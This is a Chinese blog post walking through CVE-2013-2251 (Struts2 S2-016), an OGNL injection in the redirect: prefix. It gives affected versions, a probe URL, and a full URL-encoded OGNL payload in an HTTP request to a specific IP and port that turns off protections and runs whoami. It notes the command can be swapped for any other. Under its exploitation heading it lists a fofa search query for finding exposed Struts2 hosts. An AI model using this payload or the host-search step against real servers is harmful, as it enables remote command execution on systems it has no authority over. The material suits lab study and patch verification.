struts2 命令执行 (CVE-2013-2251)

于 2024-07-16 09:22:56 发布
阅读量154 收藏
点赞数 1
分类专栏: # 命令执行 文章标签: struts 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140456339
版权

一、漏洞概述

在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。

二、影响范围

Struts 2.0.0 - Struts 2.3.15

三、漏洞验证

/index.action?redirect:%25%7B66*2%7D

如果执行66*2计算公式证明漏洞存在

四、漏洞复现

GET /index.action?redirect:%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('whoami').getInputStream())%7D HTTP/1.1
Host: 123.58.224.8:28468
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=47be73da-b525-49e6-beec-0c5b291b2e3c; _ga=GA1.1.2097748309.1721011407; _gid=GA1.1.352847630.1721011407; JSESSIONID=467F2BA723459C4EFBB2CF5476635B0E
Connection: close

通过修改whoami达到任意命令执行。

五、漏洞利用

1、fofa:app="struts2" 

风中追风-fzzf
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2013-2251漏洞示范
06-18
利用CVE-2013-2251漏洞获取服务器的webshell,从而黑入服务器
S2-016远程执行代码漏洞(CVE-2013-2251
最新发布
m0_65150886的博客
01-09 684
Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “redirect:” , “redirectAction:”对输入信息进行处理,从而改变前缀参数,这样操作的目的是方便表单中的操作。在2.3.15.1版本以前的 struts2中,没有对”action:”, “redirect:” , “redirectAction:”等进行处理,导致ongl表达式可以被执行。1.访问http://ip:port,出现如下页面,开始实验。
Struts2_016_RCE CVE-2013-2251 漏洞复现
ADummy的博客
02-18 1523
Struts2_016_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ogn
Struts2命令执行
Massimo__JAVA的博客
07-15 351
Struts2是一个基于MVC设计模式的JavaWeb应用框架,是在Struts和WebWork的技术的基础上进行合并的全新框架。
struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution
weixin_33955681的博客
07-12 557
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description struts2中有2个导航标签(action、redirect),后面可以直接跟ongl表达式,比如 1. test.actio...
Struts2 远程命令执行---检测.zip
11-15
支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测。...
struts2 cve-2016-3081 BUG版本升级整理
05-06
cve-2016-3081 BUG版本升级整理,里面有Struts 2.1.8 升级 Struts 2.3.28需要替换的jar包,如不是2.1.8的可以做一个简单的参考。可能每个人中引用的jar包不同,但通过参考能节省调试时间,希望对大家有帮助
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
CVE-2017-5638是Struts2框架中一个非常严重的远程代码执行漏洞,由于其利用方式简单且影响范围广泛,使得它成为了一大安全隐患。通过对漏洞原理的深入分析,我们可以更好地理解其产生的原因,并采取相应的措施进行...
Struts2远程命令执行验证工具
11-22
Struts2远程命令执行漏洞,通常被称为S2-045或CVE-2017-5638,是由于Struts2框架在处理特定的HTTP头信息时存在缺陷,导致攻击者可以构造恶意输入,使得服务器在解析时执行任意系统命令。这种漏洞的危险性极高,因为...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
墨者 - Struts2 命令执行系列
吃肉唐僧的博客
06-30 2942
前言 刷了好几道Struts2远程代码执行漏洞,发觉虽然触发不同,但是本质道理一样。所以整合一下目前刷过的Struts2系列漏洞。以后刷了新的再补充。 ongl 表达式 Struts2 命令执行的原因都是是通过 Ognl 表达式执行 java 代码,最终实现命令执行。所以应该需要先了解 ognl 表达式 。 此处引用http://www.zerokeeper.com/...
struts2漏洞_如何利用Struts2漏洞绕过防火墙获取Root权限
weixin_39898011的博客
12-10 391
本文我要分享的是关于Apache struts2 CVE-20132251漏洞的,由于该漏洞可以导致远程代码执行,曾一度被广泛滥用。该漏洞原理在于,通过操纵前缀为“action:”/”redirect:”/”redirectAction:”的参数,在Struts 低于2.3.15的版本框架中实现远程代码执行。此次测试中,我不仅绕过了WAF防火墙实现远程代码执行,还利用了某Linux提权...
S2-016——Struts2漏洞分析及复现(CVE-2013-2251
xy_sugar的博客
01-23 8062
漏洞原理: 空虚浪子新大牛是这么描述这个漏洞的:”在struts中,框架接收到的用户输入,除了参数、值以外,还有其他地方,比如文件名。这个漏洞,是struts2对url中的文件名做了解析,导致的ognl代码执行。” 官方是这样描述这个漏洞产生原因的:Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “redirect:” , “redirectA...
Struts2漏洞复现
weixin_51151498的博客
12-14 1313
Struts2漏洞复现
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7435
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
Struts2框架进阶(一)
李阿昀的博客
10-01 2764
Struts2框架入门之后,我们就要踏上Struts2框架漫漫的进阶之路了。我们以Struts2框架入门中的案例开始吧!Struts2框架中Action名称的搜索顺序假设某用户的请求路径的URL是http://localhost:8080/Struts2/path1/path2/path3/test.action,那么Struts2框架是怎么搜索到相应的Action来处理用户的请求呢?答案为: 首先
Struts 2 基本语法
Be_Proud的博客
12-19 791
struts2的三要素:JSP视图部分、业务控制器Action、配置struts.xml
struts2远程命令执行02
m0_71366428的博客
12-18 4152
Struts2是一个基于Java的开源Web应用程序框架,用于开发Java EE网络应用程序。它建立在Apache Struts框架的基础上,提供了更加灵活、可扩展和安全的开发方式。
CVE-2021-31805
09-02
CVE-2021-31805是一个远程命令执行漏洞,该漏洞是由于对CVE-2020-17530的修复不完整而引起的。CVE-2020-17530是由于Struts2对某些标签属性的属性值进行二次表达式解析而导致的漏洞。当这些标签属性中使用了%{x}并且x的值可被用户控制时,用户可以传入%{payload}来执行OGNL表达式。在CVE-2021-31805漏洞中,仍然存在部分标签属性会导致攻击者构造的恶意OGNL表达式执行,从而导致远程代码执行。该漏洞可能影响的版本有待进一步确认。 根据给出的引用信息,无法提供关于漏洞的具体细节或利用方式。请注意,这是一个安全漏洞,为了保护系统安全,建议及时修复该漏洞或采取相应的安全防护措施。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具](https://download.csdn.net/download/weixin_59679023/85194448)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [S2-062 远程命令执行漏洞复现(cve-2021-31805)](https://blog.csdn.net/qq_44110340/article/details/124279481)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值